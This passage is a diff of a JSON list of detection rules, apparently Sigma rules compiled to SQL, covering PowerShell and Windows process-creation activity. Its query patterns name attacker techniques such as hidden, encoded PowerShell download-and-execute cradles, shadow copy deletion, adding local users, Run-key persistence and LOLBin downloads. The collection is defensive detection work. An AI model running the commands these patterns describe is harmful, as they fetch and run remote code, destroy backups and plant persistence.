- "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.t1003" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Diagnostics" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Administrative scripts that use the same keywords." + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Suspicious Get Information for SMB Share", - "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "status": "test", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_smb_share_reco.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "Suspicious Process Discovery With Get-Process", - "id": "af4c87ce-bdda-4215-b998-15220772e993", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Get the processes that are running on the local computer.", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.discovery", - "attack.t1057" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_process.yml" - }, - { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + }, + { + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "status": "experimental", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Rare legitimate installation of kernel drivers via sc.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", - "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "status": "test", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_get_childitem_bookmarks.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Use of Program Compatibility Troubleshooter Helper" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine 